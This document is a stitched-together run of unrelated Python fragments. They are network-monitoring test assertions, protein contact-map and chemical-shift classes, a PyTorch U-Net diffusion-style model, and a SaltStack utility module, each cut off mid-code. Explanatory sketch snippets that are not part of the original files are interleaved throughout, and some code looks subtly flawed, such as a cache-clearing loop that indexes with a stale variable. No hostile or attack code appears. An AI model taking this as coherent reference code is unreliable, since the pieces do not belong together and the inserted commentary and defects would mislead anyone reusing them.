aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth101/1/14'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth101/1/15'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth101/1/16'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth101/1/17'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, 
tags=tags101 + ['port:eth101/1/18'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth101/1/19'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth101/1/20'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth101/1/21'], hostname=hn101) aggregator.assert_metric(metric_name,
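The long runs of per-port assertions above all follow one pattern: metric name, expected value, the node's base tags plus a port: tag, and the node hostname. A hypothetical table-driven helper, shown only as a sketch of how such runs could be expressed more compactly; it is not part of the test code above.

def assert_port_metrics(aggregator, metric_name, base_tags, hostname, expected):
    """expected maps a port id (e.g. 'eth1/49') to its expected value."""
    for port, value in expected.items():
        aggregator.assert_metric(
            metric_name, value=value,
            tags=base_tags + ['port:{}'.format(port)], hostname=hostname,
        )

# e.g., with values taken from the assertions above:
# assert_port_metrics(aggregator, 'cisco_aci.fabric.port.egr_bytes.unicast.cum',
#                     tags102, hn102,
#                     {'eth1/49': 222183688736.0, 'eth1/50': 212143547054.0})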
for atom in [atom1, atom2]: if atom not in self._atomset: raise ValueError("No such atom in contact map: {0}".format(atom)) self._connect(atom1, atom2) def _connect(self, atom1, atom2): if atom1 not in self._map: self._map[atom1] = set() self._map[atom1].add(atom2) if atom2 not in self._map: self._map[atom2] = set() self._map[atom2].add(atom1) def connected(self, atom1, atom2): """ Return True if the specified atoms are in contact. @param atom1: first atom @type atom1: L{Atom} @param atom2: second atom @type atom2: L{Atom} """ if atom1 in self._map: return atom2 in self._map[atom1] return False def atom_contacts(self, atom): """ Return all atoms within C{self.cutoff} angstroms of C{atom}. @param atom: anchor atom @type atom: L{Atom} @rtype: frozenset of L{Atom} """ if atom in self._map: return frozenset(self._map[atom]) else: return frozenset() def residue_contacts(self, residue): """ Return all residues, having neighboring atoms within C{self.cutoff} angstroms from any of the C{residue}'s atoms. @param residue: anchor residue @type residue: L{Residue} @rtype: frozenset of L{Residue} """ partners = set() for atom in residue.items: if atom in self._map: for partner in self._map[atom]: partners.add(partner.residue) return frozenset(partners) def position(self, rank, atom_name): """ Compute the location of C{atom} on the contact map. @param rank: residue rank (1-based) @type rank: int @param atom_name: atom name @type atom_name: str @rtype: float """ residue = self._chain.residues[rank] atom = residue.atoms[atom_name] try: return self._coords[residue.rank][atom.name] except KeyError: msg = "No atom {0} at #{1} in contact map: {2}" raise ValueError(msg.format(atom_name, rank, self._coords[residue.rank].values())) def atom_matrix(self): """ Build a 2D binary contact matrix (0=no contact, 1=contact). The order of elements in each dimension will match the order of atoms in the contact map (see L{ContactMap.atoms} and iter(L{ContactMap}). That means, the atoms in each dimension are sorted by residue number first. @deprecated: This method can be removed in future versions @rtype: numpy.array (2D) """ matrix = [] for i, atom1 in enumerate(self.atoms): matrix.append([]) for atom2 in self.atoms: if atom1 in self._map and atom2 in self._map[atom1]: matrix[i].append(1) else: matrix[i].append(0) return numpy.array(matrix) def draw(self, plot, color="black"): """ Visualize this contact map. @param plot: L{csb.io.plots.Chart}'s plot to draw on @type plot: matplotlib.AxesSubplot @param color: pixel color (must be a matplotlib color constant) @type color: str """ x, y = [], [] for atom1 in self.atoms: for atom2 in self.atom_contacts(atom1): pos1 = self.position(atom1.residue.rank, atom1.name) pos2 = self.position(atom2.residue.rank, atom2.name) assert None not in (pos1, pos2), (atom1, atom2) x.append(pos1) y.append(pos2) plot.plot(x, y, color=color, marker=",", linestyle='none') plot.set_xlim(0, self.chain.length) plot.set_ylim(0, self.chain.length) return plot @staticmethod def compare(query, reference, min_distance=0): """ Compare a query contact map against a reference. 
@type query: L{ContactMap} @type reference: L{ContactMap} @param min_distance: consider only contacts between atoms, separated by the given minimum number of residues @type min_distance: int @return: precision and coverage @rtype: L{ContactMapComparisonInfo} """ if query.chain is not reference.chain: raise ValueError("Contact maps are not comparable") if not query._map and not reference._map: raise ValueError("Can't compare empty contact maps") true_pos = 0.0 false_pos = 0.0 false_neg = 0.0 for a1, a2 in query.contacts: if abs(a1.residue.rank - a2.residue.rank) >= min_distance: if reference.connected(a1, a2): true_pos += 1.0 else: false_pos += 1.0 for a1, a2 in reference.contacts: if abs(a1.residue.rank - a2.residue.rank) >= min_distance: if not query.connected(a1, a2): false_neg += 1.0 try: precision = true_pos / (true_pos + false_pos) coverage = true_pos / (true_pos + false_neg) return ContactMapComparisonInfo(precision, coverage) except ZeroDivisionError: return ContactMapComparisonInfo(0, 0) class ContactMapComparisonInfo(object): def __init__(self, precision, coverage): self.precision = precision self.coverage = coverage class Label(object): """ Utility class for working with chemical shift labels. @param residue: residue type @type residue: L{EnumItem} @param rank: residue position (1-based) @type rank: int @param atom_name: nucleus name @type atom_name: str """ @staticmethod def build(residue_type, position, atom_name): """ Build a new string label by specifying its components. @rtype: str """ return '{0!s}#{1}:{2}'.format(residue_type, position, atom_name) @staticmethod def from_shift(shift): """ Build a new string label from a L{ChemShiftInfo}. @rtype: str """ return Label.build(shift.residue, shift.position, shift.name) @staticmethod def from_atom(atom): """ Build a new string label from an L{Atom}. @rtype: str """ return Label.build(atom.residue.type, atom.residue.rank, atom.name) @staticmethod def match(shift, atom): """ Return True if the labels of a L{ChemShiftInfo} and an L{Atom} match. @rtype: bool """ l = Label.from_shift(shift) r = Label.from_atom(atom) return r == l @staticmethod def get_atom(chain, label): """ Get the L{Atom} in a L{Chain}, designated by a given string label. @rtype: L{Atom} """ dummy, rank, atom = Label.parse(label) return chain.residues[rank].atoms[atom] @staticmethod def parse(label): """ Parse the components of a string nucleus label. @return: (residue, rank, atom) @rtype: 3-tuple """ parts = label.split("#") residue = parts[0] subparts = parts[1].split(":") rank = int(subparts[0]) atom = subparts[1] return (residue, rank, atom) @staticmethod def from_string(label): """ Parse the a string nucleus label and create a new L{Label}. @rtype: L{Label} """ residue, rank, atom = Label.parse(label) return Label(residue, rank, atom) def __init__(self, residue, rank, atom_name): self._residue = residue self._rank = rank self._atom = atom_name @property def residue(self): """ Residue type (a L{ProteinAlphabet} member) """ return self._residue @property def rank(self): """ Residue rank (1-based) """ return self._rank @property def atom_name(self): """ Nucleus name """ return self._atom def __str__(self): return Label.build(self._residue, self._rank, self._atom) class ChemShiftInfo(object): """ Chemical shift struct. 
@param position: residue rank (1-based) @type position: int @param residue: amino acid type (a member of L{ProteinAlphabet}) @type residue: str or L{EnumItem} @param name: nucleus label @type name: str @param element: nucleus type (a member of L{ChemElements}) @type element: str or L{EnumItem} @param shift: chemical shift value @type shift: float """ def __init__(self, position, residue, name, element, shift): if not isinstance(residue, pu.EnumItem) or residue.enum is not ProteinAlphabet: residue = pu.Enum.parsename(ProteinAlphabet, str(residue)) if not isinstance(element, pu.EnumItem) or element.enum is not ChemElements: element = pu.Enum.parsename(ChemElements, str(element)) self.position = int(position) self.residue = residue self.name = str(name) self.element = element self.shift = float(shift) def clone(self, name): """ Clone the current shift and create a new one with the specified nucleus label. @rtype: L{ChemShiftInfo} """ ni = self return ChemShiftInfo(ni.position, repr(ni.residue), name, repr(ni.element), ni.shift) def __str__(self): return "{0!s}#{1}:{2}".format(self.residue, self.position, self.name) @property def label(self): """ String label representation @rtype: str """ return str(self) class ChemicalShiftNetwork(object): """ Describes a network of covalently connected, chemical shift visible nuclei. @param shifts: chemical shift instances @type shifts: iterable of L{ChemShiftInfo} """ def __init__(self, shifts): self._neighbors = {} labels = {} for cs in shifts: self._neighbors[cs] = set() id = Label.from_shift(cs) labels[id] = cs conn = AtomConnectivity.get() for cs in shifts: for atom_name in conn.connected_atoms(cs.residue, cs.name): target = Label.build(cs.residue, cs.position, atom_name) if target in labels: self.connect(cs, labels[target]) def connect(self, cs1, cs2): """ Connect two nuclei. @param cs1: first chemical shift instance @type cs1: L{ChemShiftInfo} @param cs2: second chemical shift instance @type cs2: L{ChemShiftInfo} """ try: self._neighbors[cs1].add(cs2) self._neighbors[cs2].add(cs1) except KeyError: raise ValueError("Unknown chemical shift") def connected_shifts(self, source, element=None): """ Return an iterator over all covalently connected neuclei to a given C{source}. @param source: source chemical shift @type source: L{ChemShiftInfo} @rtype: iterator of L{ChemShiftInfo} """ if source not in self._neighbors: raise ValueError("No such chemical shift in this network") for cs in self._neighbors[source]: if element is None or cs.element == element: yield cs def __iter__(self): return iter(self._neighbors) class ChemShiftScoringModel(object): """ Chemical shift similarity scoring model. See C{ScoringModel.NUCLEI} for a list of supported chemical shift types. """ NUCLEI = ('CA', 'CB', 'C', 'N', 'HA') def __init__(self): self._pos = {} self._neg = {} self._pos['CA'] = GeneralizedNormal(0.02, 1.32, 1.1) self._neg['CA'] = GeneralizedNormal(-0.08, 4.23, 2.2) self._pos['CB'] = GeneralizedNormal(0.06,
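A small illustrative round-trip (hypothetical residue, rank and atom values) of the string label format shared by Label.build, Label.parse and ChemShiftInfo.__str__ above: labels are plain strings of the form '<residue>#<rank>:<atom>'.

label = '{0!s}#{1}:{2}'.format('ALA', 12, 'CA')       # Label.build -> 'ALA#12:CA'
residue, rest = label.split('#')
rank, atom = rest.split(':')
assert (residue, int(rank), atom) == ('ALA', 12, 'CA')  # Label.parse round-trip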
"""Copyright (c) 2020 <NAME>""" import os import math import copy import torch from torch import nn, einsum import torch.nn.functional as F from inspect import isfunction from functools import partial from torch.utils import data from pathlib import Path from torch.optim import Adam from torchvision import transforms, utils from PIL import Image import matplotlib.pyplot as plt import imageio import numpy as np from tqdm import tqdm from einops import rearrange try: from apex import amp APEX_AVAILABLE = True except: APEX_AVAILABLE = False # helpers functions def exists(x): return x is not None def default(val, d): if exists(val): return val return d() if isfunction(d) else d def cycle(dl): while True: for data in dl: yield data def num_to_groups(num, divisor): groups = num // divisor remainder = num % divisor arr = [divisor] * groups if remainder > 0: arr.append(remainder) return arr def loss_backwards(fp16, loss, optimizer, **kwargs): if fp16: with amp.scale_loss(loss, optimizer) as scaled_loss: scaled_loss.backward(**kwargs) else: loss.backward(**kwargs) # small helper modules class EMA(): def __init__(self, beta): super().__init__() self.beta = beta def update_model_average(self, ma_model, current_model): for current_params, ma_params in zip(current_model.parameters(), ma_model.parameters()): old_weight, up_weight = ma_params.data, current_params.data ma_params.data = self.update_average(old_weight, up_weight) def update_average(self, old, new): if old is None: return new return old * self.beta + (1 - self.beta) * new class Residual(nn.Module): def __init__(self, fn): super().__init__() self.fn = fn def forward(self, x, *args, **kwargs): return self.fn(x, *args, **kwargs) + x class SinusoidalPosEmb(nn.Module): def __init__(self, dim): super().__init__() self.dim = dim def forward(self, x): device = x.device half_dim = self.dim // 2 emb = math.log(10000) / (half_dim - 1) emb = torch.exp(torch.arange(half_dim, device=device) * -emb) emb = x[:, None] * emb[None, :] emb = torch.cat((emb.sin(), emb.cos()), dim=-1) return emb class Mish(nn.Module): def forward(self, x): return x * torch.tanh(F.softplus(x)) class Upsample(nn.Module): def __init__(self, dim): super().__init__() self.conv = nn.ConvTranspose2d(dim, dim, 4, 2, 1) def forward(self, x): return self.conv(x) class Downsample(nn.Module): def __init__(self, dim): super().__init__() self.conv = nn.Conv2d(dim, dim, 3, 2, 1) def forward(self, x): return self.conv(x) class LayerNorm(nn.Module): def __init__(self, dim, eps = 1e-5): super().__init__() self.eps = eps self.g = nn.Parameter(torch.ones(1, dim, 1, 1)) self.b = nn.Parameter(torch.zeros(1, dim, 1, 1)) def forward(self, x): std = torch.var(x, dim = 1, unbiased = False, keepdim = True).sqrt() mean = torch.mean(x, dim = 1, keepdim = True) return (x - mean) / (std + self.eps) * self.g + self.b class PreNorm(nn.Module): def __init__(self, dim, fn): super().__init__() self.fn = fn self.norm = LayerNorm(dim) def forward(self, x): x = self.norm(x) return self.fn(x) # building block modules class Block(nn.Module): def __init__(self, dim, dim_out, groups = 8): super().__init__() self.block = nn.Sequential( nn.Conv2d(dim, dim_out, 3, padding=1), nn.GroupNorm(groups, dim_out), Mish() ) def forward(self, x): return self.block(x) class ResnetBlock(nn.Module): def __init__(self, dim, dim_out, *, time_emb_dim = None, groups = 8): super().__init__() self.mlp = nn.Sequential( Mish(), nn.Linear(time_emb_dim, dim_out) ) if exists(time_emb_dim) else None self.block1 = Block(dim, dim_out) self.block2 = 
Block(dim_out, dim_out) self.res_conv = nn.Conv2d(dim, dim_out, 1) if dim != dim_out else nn.Identity() def forward(self, x, time_emb): h = self.block1(x) if exists(self.mlp): h += self.mlp(time_emb)[:, :, None, None] h = self.block2(h) return h + self.res_conv(x) class LinearAttention(nn.Module): def __init__(self, dim, heads = 4, dim_head = 32): super().__init__() self.heads = heads hidden_dim = dim_head * heads self.to_qkv = nn.Conv2d(dim, hidden_dim * 3, 1, bias = False) self.to_out = nn.Conv2d(hidden_dim, dim, 1) def forward(self, x): b, c, h, w = x.shape qkv = self.to_qkv(x) q, k, v = rearrange(qkv, 'b (qkv heads c) h w -> qkv b heads c (h w)', heads = self.heads, qkv=3) k = k.softmax(dim=-1) context = torch.einsum('bhdn,bhen->bhde', k, v) out = torch.einsum('bhde,bhdn->bhen', context, q) out = rearrange(out, 'b heads c (h w) -> b (heads c) h w', heads=self.heads, h=h, w=w) return self.to_out(out) # model class Unet(nn.Module): def __init__( self, dim, out_dim = None, dim_mults=(1, 2, 4, 8), groups = 8, channels = 3, with_time_emb = True ): super().__init__() self.channels = channels dims = [channels, *map(lambda m: dim * m, dim_mults)] in_out = list(zip(dims[:-1], dims[1:])) if with_time_emb: time_dim = dim self.time_mlp = nn.Sequential( SinusoidalPosEmb(dim), nn.Linear(dim, dim * 4), Mish(), nn.Linear(dim * 4, dim) ) else: time_dim = None self.time_mlp = None self.downs = nn.ModuleList([]) self.ups = nn.ModuleList([]) num_resolutions = len(in_out) for ind, (dim_in, dim_out) in enumerate(in_out): is_last = ind >= (num_resolutions - 1) self.downs.append(nn.ModuleList([ ResnetBlock(dim_in, dim_out, time_emb_dim = time_dim), ResnetBlock(dim_out, dim_out, time_emb_dim = time_dim), Residual(PreNorm(dim_out, LinearAttention(dim_out))), Downsample(dim_out) if not is_last else nn.Identity() ])) mid_dim = dims[-1] self.mid_block1 = ResnetBlock(mid_dim, mid_dim, time_emb_dim = time_dim) self.mid_attn = Residual(PreNorm(mid_dim, LinearAttention(mid_dim))) self.mid_block2 = ResnetBlock(mid_dim, mid_dim, time_emb_dim = time_dim) for ind, (dim_in, dim_out) in enumerate(reversed(in_out[1:])): is_last = ind >= (num_resolutions - 1) self.ups.append(nn.ModuleList([ ResnetBlock(dim_out * 2, dim_in, time_emb_dim = time_dim), ResnetBlock(dim_in, dim_in, time_emb_dim = time_dim), Residual(PreNorm(dim_in, LinearAttention(dim_in))), Upsample(dim_in) if not is_last else nn.Identity() ])) out_dim = default(out_dim, channels) self.final_conv = nn.Sequential( Block(dim, dim), nn.Conv2d(dim, out_dim, 1) ) def forward(self, x, time): t = self.time_mlp(time) if exists(self.time_mlp) else None h = [] for resnet, resnet2, attn, downsample in self.downs: x = resnet(x, t) x = resnet2(x, t) x = attn(x) h.append(x) x = downsample(x) x = self.mid_block1(x, t) x = self.mid_attn(x) x = self.mid_block2(x, t) for resnet, resnet2, attn, upsample in self.ups: x = torch.cat((x, h.pop()), dim=1) x = resnet(x, t) x = resnet2(x, t) x = attn(x) x = upsample(x) return self.final_conv(x) class GBM(nn.Module): def __init__( self, model, image_size, channels = 3, subtimeseries_length = 3, timesteps = 500, loss_type = 'l1', device='cuda' ): super().__init__() self.model = model self.image_size = image_size self.channels = channels self.k = subtimeseries_length self.num_timesteps = timesteps self.loss_type = loss_type self.device=device def extract(self, a, t, x_shape): b, *_ = t.shape out = a.gather(-1, t) return out.reshape(b, *((1,) * (len(x_shape) - 1))) @torch.no_grad() def p_sample(self, x, t): # mu_sigma = self.propagator(x, t) # 
mu=mu_sigma[:,:self.channels] # sigma=mu_sigma[:,self.channels:] # diff = self.propagator(x,t) # x_t = self.time_evolution(x, t, mu, sigma) # return x_t # diff = self.model(x,t) # return self.time_evolution(x, diff) err = self.model(x, t) mu=err[:,:self.channels] sigma=err[:,self.channels:] return x-(mu+sigma*torch.randn_like(x)) @torch.no_grad() def p_sample_loop(self, img, shape): b,_,h,w = shape for i in tqdm(reversed(range(0, self.num_timesteps)), desc='sampling loop time step', total=self.num_timesteps): img = self.p_sample(img, torch.full((b,), i, dtype=torch.long, device=self.device)) return img @torch.no_grad() def sample(self, x, batch_size = 16): image_size = self.image_size channels = self.channels return self.p_sample_loop(x, (batch_size, channels, image_size, image_size)) def sub_timeseries(self, x, t): b,n,c,h,w = x.shape mask = torch.zeros_like(x) for count, i in enumerate(t): for j in range(-self.k,self.k+1): mask[count,i+j] = 1 return x[mask==1].reshape(b,self.k*2+1,c,h,w) def stack_on_axis(self,x): return torch.cat([x[:,i] for i in range(self.k*2+1)], dim=1) def time_evolution(self, x, t, mu, sigma): W_t = torch.zeros_like(x) for count, i in enumerate(t): for j in range(i): W_t[count] += torch.randn_like(x)[0] prop = torch.exp((mu + 0.5*sigma**2) + sigma*W_t) #Propagator assert x.shape == prop.shape, f'Input shape {x.shape} must be equal to the propagator shape {prop.shape}' return x*prop # print(f"x start mean: {x.mean().item()} std:{x.std().item()}") # x_mean = x*torch.exp(mu) # x_var = torch.sqrt(x**2 * torch.exp(2*mu)*(torch.exp(sigma**2)-1)) # x = x_mean + x_var*torch.randn_like(x) # print(f"x after mean: {x.mean().item()} std:{x.std().item()}") # print(f"x_mean mean: {x_mean.mean().item()} std:{x_mean.std().item()}") # print(f"x_std start mean: {x_var.mean().item()} std:{x_var.std().item()}") # print(f"x**2 mean: {(x**2).mean().item()} std:{(x**2).std().item()}") # print(f"exp(2*mu) mean: {torch.exp(2*mu).mean().item()} std:{torch.exp(2*mu).std().item()}") # print(f"exp(sigma**2) mean: {torch.exp(sigma**2).mean().item()} std:{torch.exp(sigma**2).std().item()}") # print(f"mu start mean: {mu.mean().item()} std:{mu.std().item()}") # print(f"sigma start mean: {sigma.mean().item()} std:{sigma.std().item()}\n") # return x # def time_evolution(self, x, err): # # return (x-err)+ err*torch.randn_like(x) # return x-err def p_losses(self, x_start, t, y=None): x_start = self.sub_timeseries(x_start, t) gt_mu = torch.mean(x_start,dim=1) gt_sigma = torch.clamp(torch.std(x_start,dim=1),0.0000001) err = self.model(x_start[:,self.k-1], t) p_mu=err[:,:self.channels] p_sigma=torch.clamp(err[:,self.channels:],0.0000001) # print(p_mu.min(), p_mu.max(), gt_mu.min(), gt_mu.max()) x_t = self.time_evolution(x_start[:,self.k-1], t, p_mu, p_sigma) if self.loss_type == 'l1': loss = (x_t - x_start[:,self.k]).abs().mean() elif self.loss_type == 'l2': loss = F.mse_loss(x_t, x_start[:,self.k]) # loss = F.mse_loss(gt_mu-p_mu) + F.mse_loss(gt_sigma, p_sigma) # loss = F.mse_loss(x_start[:,k]-x_start[:,k-1], err) # loss = F.mse_loss(mu + sigma*torch.randn_like(x_start[:,0]),torch.randn_like(x_start[:,0])) # loss += F.mse_loss(x_t, x_start[:,k]) # loss = F.mse_loss((x_start[:,k]-x_start[:,k-1]), mu+sigma*torch.randn_like(x_start[:,k])) p = torch.distributions.normal.Normal(p_mu, p_sigma) q = torch.distributions.normal.Normal(gt_mu, gt_sigma) # q = torch.distributions.normal.Normal(torch.zeros_like(p_mu), torch.ones_like(p_mu)) loss += torch.distributions.kl.kl_divergence(p, q).mean() return loss def 
forward(self, x, y=None, *args, **kwargs): x = x if len(x.shape) == 5 else x[:,:,None] b, n, c, h, w, device, img_size, = *x.shape, x.device, self.image_size assert h == img_size and w == img_size, f'height {h} and width {w} of image must be {img_size}' t = torch.randint(self.k, self.num_timesteps-self.k-1, (b,), device=device).long() return self.p_losses(x, t, y, *args, **kwargs) # trainer class class TrainerGBM(object): def __init__( self, model, train_loader, valid_loader, train_batch_size = 32, train_lr = 2e-5, train_num_steps = 100000, gradient_accumulate_every = 2,
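# Usage sketch for the Unet/GBM pair above (not part of the original file, which is
# truncated at the TrainerGBM constructor). All shapes and hyper-parameters below are
# assumptions inferred from the class definitions: GBM.p_losses splits the model output
# into mu (first `channels` maps) and sigma (remaining maps), so the Unet must be built
# with out_dim = channels * 2, and `timesteps` doubles as the clip length because
# forward() samples frame indices from that range.
import torch

model = Unet(dim=64, out_dim=3 * 2, channels=3)
gbm = GBM(model, image_size=64, channels=3, subtimeseries_length=3,
          timesteps=16, loss_type='l2', device='cpu')

clip = torch.randn(2, 16, 3, 64, 64)       # (batch, frames, channels, height, width)
loss = gbm(clip)                           # L2 reconstruction + KL between predicted and empirical stats
loss.backward()

noisy = torch.randn(2, 3, 64, 64)
frames = gbm.sample(noisy, batch_size=2)   # runs p_sample for `timesteps` reverse steps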
<reponame>makinacorpus/makina-states # -*- coding: utf-8 -*- ''' .. _module_mc_utils: mc_utils / Some usefull small tools ==================================== ''' # Import salt libs from pprint import pformat import copy import cProfile import crypt import collections import datetime import traceback import socket import hashlib import logging import os import pstats import re import salt.loader import salt.template from salt.config import master_config, minion_config from salt.exceptions import SaltException import salt.utils import salt.utils.dictupdate import salt.utils.network from salt.utils.pycrypto import secure_password from salt.utils.odict import OrderedDict from salt.ext import six as six from mc_states import api import mc_states.api from distutils.version import LooseVersion _CACHE = {'mid': None} _default_marker = object() _marker = object() log = logging.getLogger(__name__) is_really_a_var = re.compile('(\{[^:}]+\})', re.M | re.U) def loose_version(*args, **kw): return LooseVersion(*args, **kw) def empty_caches(extras=None): if not extras: extras = [] for i in extras + [_CACHE]: if isinstance(i, dict): for a in [b for b in i]: i.pop(a, None) for cache in [ mc_states.api._LOCAL_CACHES, ]: for i in [a for a in cache]: val = cache[a] if isinstance(val, dict): for v in [b for b in val]: val.pop(v, None) else: cache.pop(i, None) _CACHE['mid'] = None def assert_good_grains(grains): '''' no time to search/debug why, but sometimes grains dict is empty depending on the call context grains loading bug retriggered (i fixed once, do not remember where, FU SALT ... ''' if not grains: grains = salt.loader.grains(__opts__) return grains def hash(string, typ='md5', func='hexdigest'): ''' Return the hash of a string CLI Examples:: salt-call --local mc_utils.hash foo salt-call --local mc_utils.hash foo md5 salt-call --local mc_utils.hash foo sha1 salt-call --local mc_utils.hash foo sha224 salt-call --local mc_utils.hash foo sha256 salt-call --local mc_utils.hash foo sha384 salt-call --local mc_utils.hash foo sha512 ''' if func not in ['hexdigest', 'digest']: func = 'hexdigest' if typ not in [ 'md5', 'sha1', 'sha224', 'sha256', 'sha384', 'sha512' ]: raise TypeError('{0} is not valid hash'.format(typ)) return getattr(getattr(hashlib, typ)(string), func)() def uniquify(*a, **kw): return api.uniquify(*a, **kw) def odict(instance=True): if instance: return OrderedDict() return OrderedDict def local_minion_id(force=False): ''' search in running config root then in well known config salt root then use regular salt function ''' mid = _CACHE['mid'] if mid and not force: return mid paths = api.uniquify([__opts__['config_dir'], '/etc/salt']) for path in paths: for cfgn, fun in OrderedDict( [('master', master_config), ('minion', minion_config)] ).items(): cfg = os.path.join(path, cfgn) if os.path.exists(cfg): try: cfgo = fun(cfg) mid = cfgo.get('id', None) if mid.endswith('_master'): mid = None except Exception: pass if mid: break if mid: break # normally we should never hit this case as salt generates # internally during config parsing the minion id if not mid: mid = salt.utils.network.generate_minion_id() _CACHE['mid'] = mid return mid def magicstring(thestr): """ Convert any string to UTF-8 ENCODED one """ return api.magicstring(thestr) def generate_stored_password(key, length=None, force=False, value=None): ''' Generate and store a password. At soon as one is stored with a specific key, it will never be renegerated unless you set force to true. 
''' if length is None: length = 16 reg = __salt__[ 'mc_macros.get_local_registry']( 'local_passwords', registry_format='pack') sav = False if not key in reg: sav = True rootpw = reg.setdefault(key, __salt__['mc_utils.generate_password'](length)) if force or not rootpw: rootpw = __salt__['mc_utils.generate_password'](length) sav = True if value is not None: rootpw = value reg[key] = rootpw __salt__['mc_macros.update_local_registry']( 'local_passwords', reg, registry_format='pack') return rootpw def generate_password(length=None): if length is None: length = 16 return secure_password(length) class _CycleError(Exception): '''.''' def __init__(self, msg, new=None, original_dict=None, *args, **kwargs): super(_CycleError, self).__init__(msg, *args, **kwargs) self.new = new self.original_dict = original_dict def deepcopy(arg): return copy.deepcopy(arg) def update_no_list(dest, upd, recursive_update=True): ''' Recursive version of the default dict.update Merges upd recursively into dest But instead of merging lists, it overrides them from target dict ''' if (not isinstance(dest, collections.Mapping)) \ or (not isinstance(upd, collections.Mapping)): raise TypeError('Cannot update using non-dict types in dictupdate.update()') updkeys = list(upd.keys()) if not set(list(dest.keys())) & set(updkeys): recursive_update = False if recursive_update: for key in updkeys: val = upd[key] try: dest_subkey = dest.get(key, None) except AttributeError: dest_subkey = None if isinstance(dest_subkey, collections.Mapping) \ and isinstance(val, collections.Mapping): ret = update_no_list(dest_subkey, val) dest[key] = ret else: dest[key] = upd[key] return dest else: try: dest.update(upd) except AttributeError: # this mapping is not a dict for k in upd: dest[k] = upd[k] return dest def dictupdate(dict1, dict2): ''' Merge two dictionnaries recursively test:: salt '*' mc_utils.dictupdate '{foobar: {toto: tata, toto2: tata2},titi: tutu}' '{bar: toto, foobar: {toto2: arg, toto3: arg2}}' ---------- bar: toto foobar: ---------- toto: tata toto2: arg toto3: arg2 titi: tutu ''' if not isinstance(dict1, dict): raise SaltException( 'mc_utils.dictupdate 1st argument is not a dictionnary!') if not isinstance(dict2, dict): raise SaltException( 'mc_utils.dictupdate 2nd argument is not a dictionnary!') return update_no_list(dict1, dict2) def copy_dictupdate(dict1, dict2): ''' Similar to dictupdate but with deepcopy of two merged dicts first. 
''' return dictupdate(copy.deepcopy(dict1), copy.deepcopy(dict2)) def unresolved(data): ret = None if isinstance(data, six.string_types): if '{' in data and '}' in data: if is_really_a_var.search(data): ret = True else: ret = False else: ret = False elif isinstance(data, dict): for k, val in six.iteritems(data): ret1 = unresolved(k) ret2 = unresolved(val) ret = ret1 or ret2 if ret: break elif isinstance(data, (list, set)): for val in data: ret = unresolved(val) if ret: break return ret def _str_resolve(new, original_dict=None, this_call=0, topdb=False): ''' low level and optimized call to format_resolve ''' init_new = new # do not directly call format to handle keyerror in original mapping # where we may have yet keyerrors if isinstance(original_dict, dict): for k in original_dict: reprk = k if not isinstance(reprk, six.string_types): reprk = '{0}'.format(k) subst = '{' + reprk + '}' if subst in new: subst_val = original_dict[k] if isinstance(subst_val, (list, dict)): inner_new = format_resolve( subst_val, original_dict, this_call=this_call, topdb=topdb) # composed, we take the repr if new != subst: new = new.replace(subst, str(inner_new)) # no composed value, take the original list else: new = inner_new else: if new != subst_val: new = new.replace(subst, str(subst_val)) if not unresolved(new): # new value has been totally resolved break return new, new != init_new def str_resolve(new, original_dict=None, this_call=0, topdb=False): return _str_resolve( new, original_dict=original_dict, this_call=this_call, topdb=topdb)[0] def _format_resolve(value, original_dict=None, this_call=0, topdb=False, retry=None, **kwargs): ''' low level and optimized call to format_resolve ''' if not original_dict: original_dict = OrderedDict() if this_call == 0: if not original_dict and isinstance(value, dict): original_dict = value changed = False if kwargs: original_dict.update(kwargs) if not unresolved(value): return value, False if isinstance(value, dict): new = type(value)() for key, v in value.items(): val, changed_ = _format_resolve(v, original_dict, topdb=topdb) if changed_: changed = changed_ new[key] = val elif isinstance(value, (list, tuple)): new = type(value)() for v in value: val, changed_ = _format_resolve(v, original_dict, topdb=topdb) if changed_: changed = changed_ new = new + type(value)([val]) elif isinstance(value, six.string_types): new, changed_ = _str_resolve(value, original_dict, topdb=topdb) if changed_: changed = changed_ else: new = value if retry is None: retry = unresolved(new) while retry and (this_call < 100): new, changed = _format_resolve(new, original_dict, this_call=this_call, retry=False, topdb=topdb) if not changed: retry = False this_call += 1 return new, changed def format_resolve(value, original_dict=None, this_call=0, topdb=False, **kwargs): ''' Resolve a dict of formatted strings, mappings & list to a valued dict Please also read the associated test:: {"a": ["{b}", "{c}", "{e}"], "b": 1, "c": "{d}", "d": "{b}", "e": "{d}", } ====> {"a": ["1", "1", "{e}"], "b": 1, "c": "{d}", "d": "{b}", "e": "{d}", } ''' return _format_resolve(value, original_dict=original_dict, this_call=this_call, topdb=topdb, **kwargs)[0] def is_a_str(value): ''' is the value a stirng ''' return isinstance(value, six.string_types) def is_a_bool(value): ''' is the value a bool ''' return isinstance(value, bool) def is_a_int(value): ''' is the value an int ''' return isinstance(value, int) def is_a_float(value): ''' is the value a float ''' return isinstance(value, float) def is_a_complex(value): ''' 
is the value a complex ''' return isinstance(value, complex) def is_a_long(value): ''' is the value a long ''' return isinstance(value, long) def is_a_number(value): ''' is the value a number ''' return ( is_a_int(value) or is_a_float(value) or is_a_complex(value) or is_a_long(value) ) def is_a_set(value): ''' is the value a set ''' return isinstance(value, set) def is_a_tuple(value): ''' is the value a tuple ''' return isinstance(value, tuple) def is_a_list(value): ''' is the value a list ''' return isinstance(value, list) def is_a_dict(value): ''' is the value a dict ''' return isinstance(value, dict) def is_iter(value): ''' is the value iterable (list, set, dict tuple) ''' return ( is_a_list(value) or is_a_dict(value) or is_a_tuple(value) or is_a_set(value) ) def traverse_dict(data, key, delimiter=salt.utils.DEFAULT_TARGET_DELIM): ''' Handle the fact to traverse dicts
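# A minimal illustration of dictupdate() / update_no_list() defined above, using the
# same values as the salt-call example in the dictupdate docstring: nested mappings
# are merged key by key, while scalar values (and lists) from the second dict win.
base = {'foobar': {'toto': 'tata', 'toto2': 'tata2'}, 'titi': 'tutu'}
override = {'bar': 'toto', 'foobar': {'toto2': 'arg', 'toto3': 'arg2'}}
merged = dictupdate(base, override)
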